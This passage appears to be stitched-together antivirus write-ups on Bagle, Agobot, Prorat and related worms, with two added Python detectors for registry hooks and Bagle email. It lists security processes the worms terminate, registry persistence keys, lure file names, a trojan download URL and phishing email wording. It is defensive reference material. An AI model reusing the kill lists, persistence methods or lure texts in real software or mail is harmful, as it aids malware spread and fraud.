NPROTECT.EXE
NSCHED32.EXE
NTVDM.EXE
NVARCH16.EXE
KERIO-WRP-421-EN-WIN.EXE
KILLPROCESSSETUP161.EXE
LDPRO.EXE
LOCALNET.EXE
LOCKDOWN.EXE
LOCKDOWN2000.EXE
LSETUP.EXE
OUTPOST.EXE
CFIAUDIT.EXE
LUCOMSERVER.EXE
AGENTSVR.EXE
ANTI-TROJAN.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATWATCH.EXE
AVCONSOL.EXE
AVGSERV9.EXE
AVSYNMGR.EXE
BD_PROFESSIONAL.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCP.EXE
BIPCPEVALSETUP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BOOTWARN.EXE
NWINST4.EXE
NWTOOL16.EXE
OSTRONET.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PAVPROXY.EXE
DRWEBUPW.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PDSETUP.EXE
PERISCOPE.EXE
PERSFW.EXE
PF2.EXE
AVLTMAIN.EXE
PFWADMIN.EXE
PINGSCAN.EXE
PLATIN.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
PROCEXPLORERV1.0.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
AVWUPD32.EXE
NUPGRADE.EXE
WHOSWATCHINGME.EXE
WINRECON.EXE
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WSBGATE.EXE
WYVERNWORKSFIREWALL.EXE
XPF202EN.EXE
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
CLEANER3.EXE
CLEANPC.EXE
CMGRDIAN.EXE
CMON016.EXE
CPD.EXE
CFGWIZ.EXE
CFIADMIN.EXE
PURGE.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
RAV8WIN32ENG.EXE
REGEDT32.EXE
REGEDIT.EXE
UPDATE.EXE
RESCUE.EXE
RESCUE32.EXE
RRGUARD.EXE
RSHELL.EXE
RTVSCN95.EXE
RULAUNCH.EXE
SAFEWEB.EXE
SBSERV.EXE
SD.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SFC.EXE
SGSSFW32.EXE
SH.EXE
SHELLSPYINSTALL.EXE
SHN.EXE
SMC.EXE
SOFI.EXE
SPF.EXE
SPHINX.EXE
SPYXX.EXE
SS3EDIT.EXE
ST2.EXE
SUPFTRL.EXE
LUALL.EXE
SUPPORTER5.EXE
SYMPROXYSVC.EXE
SYSEDIT.EXE
TASKMON.EXE
TAUMON.EXE
TAUSCAN.EXE
TC.EXE
TCA.EXE
TCM.EXE
TDS2-98.EXE
TDS2-NT.EXE
TDS-3.EXE
TFAK5.EXE
TGBOB.EXE
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
UNDOBOOT.EXE
VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VFSETUP.EXE
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXE
VNPC3000.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCENU6.02D30.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
W32DSM89.EXE
W9X.EXE
WATCHDOG.EXE
WEBSCANX.EXE
CFIAUDIT.EXE
CFINET.EXE
ICSUPP95.EXE
MCUPDATE.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
LUINIT.EXE
MCAGENT.EXE
MCUPDATE.EXE
MFW2EN.EXE
MFWENG3.02D30.EXE
MGUI.EXE
MINILOG.EXE
MOOLIVE.EXE
MRFLUX.EXE
MSCONFIG.EXE
MSINFO32.EXE
MSSMMC32.EXE
MU0311AD.EXE
NAV80TRY.EXE
ZAUINST.EXE
ZONALM2601.EXE
ZONEALARM.EXE
A registry entry is added to the following key so that the program
directs.exe loads every time you logon to your computer:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
W32/Bagle-R makes multiple copies of itself into folders which are
likely to be part of a file-sharing network. The filenames used are:
Microsoft Office 2003 Crack, Working!.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno Screensaver.scr
Serials.txt.exe
Porno pics arhive, xxx.exe
Windows Sourcecode update.doc.exe
Ahead Nero 7.exe
Windown Longhorn Beta Leak.exe
Opera 8 New!.exe
XXX hardcore images.exe
WinAmp 6 New!.exe
WinAmp 5 Pro Keygen Crack Update.exe
Adobe Photoshop 9 full.exe
Matrix 3 Revolution English Subtitles.exe
ACDSee 9.exe
W32/Bagle-R infects programs on your PC by appending itself to existing
EXE files. The danger of W32/Bagle-R can be mitigated not only by
updating Sophos Anti-Virus but also by blocking connections to TCP port
81 at your network firewall (this port is unlikely to be required for
any real services).
Blocking outbound port 81 connections stops computers on your network
from downloading the worm from outside. Blocking port 81 inbound means
that even if you do get infected you will not pass the virus on to
others.
You should also apply the latest Internet Explorer/Outlook Express
patches from Microsoft. The vulnerability used by W32/Bagle-R is
described in Microsoft Security Bulletin MS03-040 and is referred to as
the "Object Tag vulnerability in Popup Window".
W32/Agobot-ED
Aliases
Backdoor.Agobot.3.gen, W32/Gaobot.worm.gen.d
Type
Win32 worm
Detection
At the time of writing, Sophos has received just one report of this worm
from the wild.
Description
W32/Agobot-ED is a network worm which also allows unauthorised remote
access to the computer via IRC channels.
W32/Agobot-ED tries to copy itself to network shares with weak passwords.
W32/Agobot-ED copies itself to the Windows system folder as FILENAME.EXE
and creates entries in the registry at the following locations to run
itself on system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\
Run\Configuration Loader
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
Configuration Loader
The worm disables the shares C$, D$, ADMIN$ and IPC$.
W32/Agobot-ED attempts to terminate the following virus, anti-virus and
security processes:
tftpd.exe
dllhost.exe
winppr32.exe
mspatch.exe
penis32.exe
msblast.exe
ZONEALARM.EXE
WFINDV32.EXE
WEBSCANX.EXE
VSSTAT.EXE
VSHWIN32.EXE
VSECOMR.EXE
VSCAN40.EXE
VETTRAY.EXE
VET95.EXE
TDS2-NT.EXE
TDS2-98.EXE
TCA.EXE
TBSCAN.EXE
SWEEP95.EXE
SPHINX.EXE
SMC.EXE
SERV95.EXE
SCRSCAN.EXE
SCANPM.EXE
SCAN95.EXE
SCAN32.EXE
SAFEWEB.EXE
RESCUE.EXE
RAV7WIN.EXE
RAV7.EXE
PERSFW.EXE
PCFWALLICON.EXE
PCCWIN98.EXE
PAVW.EXE
PAVSCHED.EXE
PAVCL.EXE
PADMIN.EXE
OUTPOST.EXE
NVC95.EXE
NUPGRADE.EXE
NORMIST.EXE
NMAIN.EXE
NISUM.EXE
NAVWNT.EXE
NAVW32.EXE
NAVNT.EXE
NAVLU32.EXE
NAVAPW32.EXE
N32SCANW.EXE
MPFTRAY.EXE
MOOLIVE.EXE
LUALL.EXE
LOOKOUT.EXE
LOCKDOWN2000.EXE
JEDI.EXE
IOMON98.EXE
IFACE.EXE
ICSUPPNT.EXE
ICSUPP95.EXE
ICMON.EXE
ICLOADNT.EXE
ICLOAD95.EXE
IBMAVSP.EXE
IBMASN.EXE
IAMSERV.EXE
IAMAPP.EXE
FRW.EXE
FPROT.EXE
FP-WIN.EXE
FINDVIRU.EXE
F-STOPW.EXE
F-PROT95.EXE
F-PROT.EXE
F-AGNT95.EXE
ESPWATCH.EXE
ESAFE.EXE
ECENGINE.EXE
DVP95_0.EXE
DVP95.EXE
CLEANER3.EXE
CLEANER.EXE
CLAW95CF.EXE
CLAW95.EXE
CFINET32.EXE
CFINET.EXE
CFIAUDIT.EXE
CFIADMIN.EXE
BLACKICE.EXE
BLACKD.EXE
AVWUPD32.EXE
AVWIN95.EXE
AVSCHED32.EXE
AVPUPD.EXE
AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVNT.EXE
AVKSERV.EXE
AVGCTRL.EXE
AVE32.EXE
AVCONSOL.EXE
AUTODOWN.EXE
APVXDWIN.EXE
ANTI-TROJAN.EXE
ACKWIN32.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
W32/Agobot-ED listens on a particular port and supplies a copy of the
worm in response to incoming connections.
Troj/Prorat-D
Aliases
Backdoor.Prorat.15
Type
Trojan
Detection
At the time of writing, Sophos has received just one report of this
Trojan from the wild.
Description
Troj/Prorat-D is a backdoor Trojan which may allow unauthorised access
and control of the computer from a remote network location.
Upon execution, Troj/Prorat-D drops copies of itself into the Windows
System or System32 folder using one or more of the filenames
FSERVICE.EXE, FFSERVICE.EXE, DSERVICE.EXE, LSERVICE.EXE, SSERVICE.EXE
and WSERVICE.EXE.
Troj/Prorat-D adds the following registry entries so that it is run on
startup:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Windows Reg Services = C:\\
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
Windows Reg Services = C:\\
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
Shell = Explorer.exe C:\\
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows Reg Services = C:\\
DirectX for Microsoft Windows = C:\\
HKLM\Software\Microsoft\Active Setup\Installed Components\
[A75aed00-d7bf-11d1-9947-00c0Cf98bbc9]\
StubPath = C:\\
HKLM\Software\Microsoft\Active Setup\Installed Components\
[5Y99AE78-58TT-11dW-BE53-Y67078979Y]\
StubPath = C:\\
This Trojan may also attempt to download and install the file
http://members.lycos.co.uk/kabloboy/XP_Update v1.5.3.exe.
This will be copied into the Windows folder under WINLOGON.EXE.
This program will drop the file WINKEY.DLL into the Windows System
folder and create the following registry entry:
HKCU\Software\Microsoft DirectX\WinSettings\
Troj/Prorat-C is embedded within WINKEY.DLL.
The downloaded file will also change the value in the [boot] and
[windows] sections of the files SYSTEM.INI and WIN.INI (respectively),
in the Windows folder by including the path to a copy of the original
file, e.g.
File : SYSTEM.INI
Section : boot
Parameter : shell
(New) Value : EXPLORER.EXE C:\\
File : WIN.INI
Section : windows
Parameter : run
(New) Value : C:\\
Troj/Prorat-D may also employ counter-removal tricks so that it becomes
difficult to terminate the Trojan process.
Furthermore the Trojan may monitor the registry entries above such that
the entries are restored immediately if changed.
W32/Protoride-F
Aliases
Worm.Win32.Protoride.f, W32/Protoride.worm, W32.Protoride.Worm
Type
Win32 worm
Detection
At the time of writing, Sophos has received just one report of this worm
from the wild.
Description
W32/Protoride-F is a Windows worm that spreads via network shares. The
worm also has a backdoor component that allows unauthorised remote
access to the computer via IRC channels.
W32/Protoride-F attempts to copy itself to the Windows system folder
with the filename rdpty.exe and then set the following registry entry so
as to run itself before all EXE files:
HKCR\exefile\shell\open\command
W32/Protoride-F attempts to copy itself to msupdate.exe in the startup
folder of shared network computers.
W32/Protoride-F may also set the following registry entry:
HKLM\Software\BeyonD inDustries\ProtoType[v2]
W32/Protoride-F remains resident, running in the background as a service
process and listening for commands from remote users via IRC channels.
W32/Bagle-N
Type
Win32 executable file virus
Detection
Sophos has received several reports of this virus from the wild.
Description
W32/Bagle-N is an email worm which sends itself via its own SMTP engine
to addresses harvested from your hard disk. The worm searches for files
with the extensions WAB, TXT, HTM, XML, DBX, MDX, EML, NCH, MMF, ODS,
CFG, ASP, PHP, PL, ADB, TBB and SHT.
When run the worm copies itself to the Windows system folder using the
name winupd.exe.
Note that W32/Bagle-N is also a parasitic virus which infects .EXE files
already present on your hard disk. If you run an infected program, then
the worm file will reappear, just as if you had opened an infected email
attachment. Be sure to replace or to disinfect files infected in this
way to prevent winupd.exe from reappearing. (See the Recovery section
below.)
W32/Bagle-N adds the value:
winupd.exe = [SYSTEM]\winupd.exe
to the registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This means that W32/Bagle-N runs every time you logon to your computer.
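The write-ups above all persist through a handful of registry locations: the Run and RunServices keys (Bagle-Q/R with directs.exe, Bagle-N with winupd.exe, Agobot-FG with EXPLORED.EXE, Agobot-ED and Prorat-D with named values), the Winlogon Shell value and Active Setup StubPath entries (Prorat-D), the HKCR\exefile\shell\open\command handler (Protoride-F), a service key (Agobot-FG's "mpr") and plain marker keys (Protoride-F, Bdoor-CCK). The following is an added example, not Sophos code, that audits an exported .reg file for all of these at once. The .reg text is constructed; the key paths and file names are the ones given in the write-ups, and the parser only decodes REG_SZ values, which is all the checks need.

```python
"""Audit a registry export (.reg) for the autostart hooks and marker keys
described in the write-ups (Bagle-Q/R/N, Agobot-FG, Prorat-D, Protoride-F,
Bdoor-CCK).  Added example, not Sophos code; the export text below is
constructed, the key paths and file names come from the page."""
import re
from pathlib import PureWindowsPath

# Dropper file names the write-ups give (compared case-insensitively).
DROPPER_NAMES = {
    "directs.exe", "direct.exe",                       # W32/Bagle-Q, W32/Bagle-R
    "winupd.exe",                                      # W32/Bagle-N
    "explored.exe",                                    # W32/Agobot-FG
    "rdpty.exe", "msupdate.exe",                       # W32/Protoride-F
    "fservice.exe", "ffservice.exe", "dservice.exe",   # Troj/Prorat-D
    "lservice.exe", "sservice.exe", "wservice.exe",
}
# Keys whose string values are launched at logon/boot.
AUTOSTART_KEY = re.compile(
    r"\\CurrentVersion\\(Run|RunServices|policies\\Explorer\\Run)$"
    r"|\\Active Setup\\Installed Components\\[^\\]+$", re.I)
# Keys the worms create for themselves (bare presence is the indicator).
MARKER_KEYS = {k.lower() for k in (
    r"HKEY_LOCAL_MACHINE\Software\BeyonD inDustries\ProtoType[v2]",  # Protoride-F
    r"HKEY_LOCAL_MACHINE\Software\blss",                              # Bdoor-CCK
    r"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MPR")}     # Agobot-FG
EXEFILE_CMD = r"hkey_classes_root\exefile\shell\open\command"
WINLOGON = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"

def parse_reg(text):
    """Return {key: {value_name: string_data}} from a .reg export.
    Only REG_SZ values are decoded; that is all these checks need."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line and line.endswith('"'):
            name, data = line.split("=", 1)
            if data.startswith('"'):
                name = "(Default)" if name == "@" else name.strip('"')
                # .reg escapes backslash and quote with a backslash
                keys[current][name] = re.sub(r"\\(.)", r"\1", data[1:-1])
    return keys

def exe_name(command):
    """Lower-cased file name of the first program in a command line."""
    command = command.strip()
    first = command[1:].split('"', 1)[0] if command.startswith('"') else command.split(" ")[0]
    return PureWindowsPath(first).name.lower()

def audit(keys):
    """Return [(registry path, reason)] for every suspicious entry."""
    findings = []
    for key, values in keys.items():
        lk = key.lower()
        if lk in MARKER_KEYS:
            findings.append((key, "marker key created by the worm"))
        if AUTOSTART_KEY.search(key):
            for name, data in values.items():
                if exe_name(data) in DROPPER_NAMES:
                    findings.append((key + "\\" + name, "autostart of " + exe_name(data)))
        if lk == EXEFILE_CMD and values.get("(Default)", "").strip() != '"%1" %*':
            findings.append((key, "EXE handler hijacked: " + values.get("(Default)", "")))
        if lk == WINLOGON and "Shell" in values and values["Shell"].strip().lower() != "explorer.exe":
            findings.append((key + "\\Shell", "extra shell program: " + values["Shell"]))
    return findings

# Constructed export: one benign Run entry ("Acme Updater") among the hooks
# named in the write-ups.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"directs.exe"="C:\\WINDOWS\\system32\\directs.exe"
"Acme Updater"="\"C:\\Program Files\\Acme\\updater.exe\" /quiet"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"winupd.exe"="C:\\WINDOWS\\system32\\winupd.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="C:\\WINDOWS\\system32\\rdpty.exe \"%1\" %*"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe C:\\WINDOWS\\system32\\fservice.exe"

[HKEY_LOCAL_MACHINE\Software\BeyonD inDustries\ProtoType[v2]]
@=""
'''

if __name__ == "__main__":
    for path, reason in audit(parse_reg(SAMPLE_REG)):
        print(f"{reason}: {path}")
```

The two structural checks (exefile handler and Winlogon Shell) do not depend on the dropper name list, so they also catch variants that use a different file name; the name list is there for the Run-style keys where a legitimate default value does not exist.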
Emails have the following characteristics:
Subject lines:
E-mail account security warning.
Notify about using the e-mail account.
Warning about your e-mail account.
Important notify about your e-mail account.
Email account utilization warning.
E-mail technical support message.
E-mail technical support warning.
Email report
Important notify
Account notify
E-mail warning
Notify from e-mail technical support.
Notify about your e-mail account utilization.
E-mail account disabling warning.
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
Attached filenames:
Attach
Information
Details
Encrypted
first_part
Readme
Document
TextDocument
details
text_document
pub_document
MoreInfo
Message
Attached files arrive either as programs (with a .PIF extension) or as
password-protected archives (with a .ZIP or .RAR extension). The
password is included in the email.
[Image: a typical email sent by W32/Bagle-N]
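The two Bagle mail forms on this page look different at a gateway: the Bagle-Q/R carrier (detected as W32/Bagle-HTML) has a subject from the list above, no visible text and an HTML part that fetches from port 81 of an infected host, while Bagle-N carries a .PIF, .ZIP or .RAR attachment with one of the stems listed above and a subject from either list. The following is an added example, not Sophos code, that extracts these indicators from raw messages and combines them conservatively; the three sample messages are constructed with documentation addresses.

```python
"""Mail-gateway indicators for the two Bagle mail forms described on this page:
the attachment-less "carrier" mail of W32/Bagle-Q and W32/Bagle-R (detected as
W32/Bagle-HTML) and the attachment mail of W32/Bagle-N.  Added example, not
Sophos code; the sample messages are constructed with documentation addresses."""
import base64
import email
import re
from email import policy

CARRIER_SUBJECTS = {s.lower() for s in (
    "Re: Msg reply", "Re: Hello", "Re: Yahoo!", "Re: Thank you!", "Re: Thanks :)",
    "RE: Text message", "Re: Document", "Incoming message", "Re: Incoming Message",
    "Re: Incoming Fax", "Hidden message", "Fax Message Received", "Protected message",
    "RE: Protected message", "Forum notify", "Request response", "Site changes",
    "Re: Hi", "Encrypted document")}
BAGLE_N_SUBJECTS = CARRIER_SUBJECTS | {s.lower() for s in (
    "E-mail account security warning.", "Notify about using the e-mail account.",
    "Warning about your e-mail account.", "Important notify about your e-mail account.",
    "Email account utilization warning.", "E-mail technical support message.",
    "E-mail technical support warning.", "Email report", "Important notify",
    "Account notify", "E-mail warning", "Notify from e-mail technical support.",
    "Notify about your e-mail account utilization.", "E-mail account disabling warning.")}
BAGLE_N_ATTACH_STEMS = {s.lower() for s in (
    "Attach", "Information", "Details", "Encrypted", "first_part", "Readme", "Document",
    "TextDocument", "text_document", "pub_document", "MoreInfo", "Message")}
BAGLE_N_ATTACH_EXTS = {"pif", "zip", "rar"}
# An http URL whose host part carries the worm's TCP/81 download port.
PORT81_URL = re.compile(r"https?://[^\s\"'<>]+:81(?=[/\s\"'<>]|$)", re.I)

def mail_indicators(raw):
    """Return the set of indicator names found in one RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = (msg.get("Subject") or "").strip().lower()
    found = set()
    if subject in CARRIER_SUBJECTS:
        found.add("carrier_subject")
    if subject in BAGLE_N_SUBJECTS:
        found.add("bagle_n_subject")
    text, html, attachments = "", "", []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        if part.get_content_disposition() == "attachment":
            attachments.append(part.get_filename() or "")
        elif part.get_content_type() == "text/plain":
            text += part.get_content()
        elif part.get_content_type() == "text/html":
            html += part.get_content()
    if html and not text.strip():
        found.add("no_visible_text")   # the carrier mail has no visible text
    if PORT81_URL.search(html):
        found.add("port81_url")        # download from an infected host's port 81
    if re.search(r"<object\b", html, re.I):
        found.add("object_tag")        # the write-up names an "Object Tag" bug
    for name in attachments:
        stem, _, ext = name.rpartition(".")
        if stem.lower() in BAGLE_N_ATTACH_STEMS and ext.lower() in BAGLE_N_ATTACH_EXTS:
            found.add("bagle_n_attachment")
    return found

def classify(raw):
    """'carrier', 'bagle-n' or None; a matching subject alone is never enough."""
    found = mail_indicators(raw)
    if "port81_url" in found and found & {"carrier_subject", "no_visible_text"}:
        return "carrier"
    if {"bagle_n_attachment", "bagle_n_subject"} <= found:
        return "bagle-n"
    return None

# Constructed samples; the zip attachment is an empty archive.
EMPTY_ZIP_B64 = base64.b64encode(b"PK\x05\x06" + b"\x00" * 18).decode()
CARRIER_SAMPLE = """\
From: mailer@example.org
Subject: Re: Incoming Fax
Content-Type: multipart/alternative; boundary="sep"

--sep
Content-Type: text/plain

--sep
Content-Type: text/html

<html><body><object data="http://192.0.2.10:81/"></object></body></html>
--sep--
"""
BAGLE_N_SAMPLE = f"""\
From: support@example.net
Subject: E-mail account security warning.
Content-Type: multipart/mixed; boundary="sep"

--sep
Content-Type: text/plain

The attached file is password protected. Password: 12345
--sep
Content-Type: application/zip; name="Details.zip"
Content-Disposition: attachment; filename="Details.zip"

{EMPTY_ZIP_B64}
--sep--
"""
BENIGN_SAMPLE = "From: a@example.net\nSubject: Re: Hello\n\nAre we still on for 3pm?\n"
```

The subject lists are deliberately weak evidence on their own ("Re: Hello" is an ordinary subject), so `classify` requires the port-81 URL for the carrier form and the attachment for the Bagle-N form before it reports a match.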
W32/Bagle-N opens up a backdoor and listens for connections. If it
receives the appropriate command it attempts to download and execute a
file. W32/Bagle-N also makes a web connection to a remote URL, thus
reporting the location and open port of infected computers.
W32/Bagle-N attempts to terminate several anti-virus and
security-related processes.
W32/Bagle-N searches the mapped drives for folders whose names contain
the string "shar". The worm copies itself to these folders using the
names:
ACDSee 9.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
Matrix 3 Revolution English Subtitles.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Opera 8 New!.exe
Porno Screensaver.scr
Porno pics arhive, xxx.exe
Porno, sex, oral, anal cool, awesome!!.exe
Serials.txt.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe
Curiously, the author of the worm has hidden an ASCII text
representation of a butterfly inside the viral code, alongside the
words:
The White Rabbit Presents
The first and the single
Anti-NetSky AntiVirus
Hidden inside the Bagle-N worm is a picture of a butterfly
Troj/Bdoor-CCK
Aliases
BackDoor-CCK
Type
Trojan
Detection
At the time of writing, Sophos has received just one report of this
Trojan from the wild.
Description
Troj/Bdoor-CCK is a backdoor Trojan. This program may drop the file
WMER.HTM into the Windows Help folder and also drop the file Trojan.INI
into the Windows folder.
Troj/Bdoor-CCK will also set the following registry entries so that it
runs on system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
blss =
HKLM\Software\blss\installdate =
W32/Bagle-Zip
Aliases
Win32/Bagle.gen.zip
Type
Win32 worm
Detection
Sophos has received several reports of this worm from the wild.
Description
Sophos Anti-Virus detects as W32/Bagle-Zip the password-protected
archive files created by W32/Bagle-F, W32/Bagle-G, W32/Bagle-H,
W32/Bagle-I, W32/Bagle-J, W32/Bagle-K (ZIP archives), W32/Bagle-N and
W32/Bagle-O (ZIP and RAR archives).
W32/Bagle-O
Type
Win32 worm
Detection
Sophos has received several reports of this worm from the wild.
Description
W32/Bagle-O is an email worm which sends itself via its own SMTP engine
to addresses harvested from your hard disk. The worm searches for files
with the following extensions:
WAB, TXT, MSG, HTM, SHTM, STM, XML, DBX, MBX, MDX, EML, NCH, MMF, ODS,
CFG, ASP, PHP, PL, ADB, TBB, SHT, XLS, OFT, UIN, CGI, MHT, DHTM, JSP.
When run, the worm copies itself to the Windows system folder using the
name winupd.exe.
Note that W32/Bagle-O is also a parasitic virus which infects EXE files
already present on your hard disk (infected files are detected as
W32/Bagle-N). If you run an infected program the worm file will
reappear, just as if you had opened an infected email attachment. Be
sure to replace or to disinfect files infected in this way to prevent
winupd.exe from reappearing. (See the Recovery section below.)
W32/Bagle-O adds the value:
winupd.exe = \winupd.exe
to the registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This means that W32/Bagle-O runs every time you log on to your computer.
W32/Bagle-O avoids email addresses containing the following:
sopho, {at}hotmail.com, {at}msn, {at}microsoft, anyone{at}, bugs{at}, contract{at}, feste,
gold-certs{at}, help{at}, info{at}, nobody{at}, noone{at}, rating{at}, kasp, admin,
icrosoft, support, ntivi, unix, bsd, linux, listserv, certific, samples,
{at}foo, {at}iana, free-av, {at}messagelab, winzip, google, winrar, abuse, panda,
cafee, spam, pgp, {at}avp., noreply, local, root{at}, postmaster{at}, f-secur
Emails have the following characteristics:
Subject lines:
E-mail account security warning.
Notify about using the e-mail account.
Warning about your e-mail account.
Important notify about your e-mail account.
Email account utilization warning.
E-mail technical support message.
E-mail technical support warning.
Email report
Important notify
Account notify
E-mail warning
Notify from e-mail technical support.
Notify about your e-mail account utilization.
E-mail account disabling warning.
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
Message texts (constructed from the following):
Dear user of ,
Dear user of e-mail server gateway,
Dear user of "" mailing server,
Dear user of "" mailing domain,
Dear user of "" domain,
Dear user of e-mail server "",
Hello user of e-mail server,
Dear user of "" mailing system,
Dear user, the management of mailing system
wants to let you know that,
Your e-mail account has been temporary disabled because of unauthorized
access.
Our main mailing server will be temporary unavaible for next two days,
to continue receiving mail in these days you have to configure our free
auto-forwarding service.
Your e-mail account will be disabled because of improper using in next
three days, if you are still wishing to use it, please, resign your
account information.
We warn you about some attacks on your e-mail account. Your computer may
contain viruses, in order to keep your computer and e-mail account safe,
please, follow the instructions.
Our antivirus software has detected a large ammount of viruses outgoing
from your email account, you may use our free anti-virus tool to clean
up your computer software.
Some of our clients complained about the spam (negative e-mail content)
outgoing from your e-mail account. Probably, you have been infected by a
proxy-relay trojan server. In order to keep your computer safe, follow
the instructions.
Read the attach.
Your file is attached.
More info in attach
See attach.
Follow the wabbit.
Find the white rabbit.
Please, have a look at the attached file.
See the attached file for details.
Message is in attach
Here is the file.
For more information see the attached file.
Further details can be obtained from attached file.
Advanced details can be found in attached file.
For details see the attach.
For details see the attached file.
For further details see the attach.
Please, read the attach for further details.
Pay attention on attached file.
The team
The Management,
Sincerely,
Best wishes,
Yours,
Have a good day,
Cheers,
Kind regards,
For security reasons attached file is password protected. The password
is
For security purposes the attached file is password protected. Password
--
Note: Use password to open archive.
Attached file is protected with the password for security reasons.
Password is
In order to read the attach you have to use the following password:
Archive password:
Password -
Password:
Note that the email may also carry image files with the extension BMP,
GIF or JPEG which contain the password.
Attached filenames:
Attach
Information
Details
Encrypted
first_part
Readme
Document
Info
TextDocument
Text
details
text_document
pub_document
MoreInfo
Message
Note that the attached file arrives either as a program (with an EXE or
PIF extension) or as a password-protected archive (with a ZIP or RAR
extension). The password is included in the email.
A typical email sent by W32/Bagle-O
W32/Bagle-O opens port 2556 and listens for remote commands. If it
receives the appropriate command it attempts to download and execute a
file. W32/Bagle-O also makes a web connection to a remote URL, thus
reporting the location and open port of infected computers.
W32/Bagle-O attempts to terminate a wide range of anti-virus and
security-related processes.
W32/Bagle-O searches the mapped drives for folders whose names contain
the string "shar". The worm copies itself to these folders using the
names:
ACDSee 9.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
Matrix 3 Revolution English Subtitles.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Opera 8 New!.exe
Porno Screensaver.scr
Porno pics arhive, xxx.exe
Porno, sex, oral, anal cool, awesome!!.exe
Serials.txt.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe
If run after 31 December 2005 the worm deletes the registry entries it
created when first run.
Curiously, the author of the worm has hidden an ASCII text
representation of a butterfly inside the virus code, alongside the
words:
The White Rabbit Presents
The first and the single
Anti-NetSky AntiVirus
Hidden inside the Bagle-O worm is a picture of a butterfly
W32/Bagle-J
Aliases
I-Worm.Bagle.i, W32/Bagle.j{at}MM, Win32/Bagle.J, W32.Beagle.J{at}mm,
WORM_BAGLE.J
Type
Win32 worm
Detection
Sophos has received many reports of this worm from the wild.
Description
NOTE: W32/Bagle-J sends itself as a password protected ZIP file that is
detected as W32/Bagle-Zip.
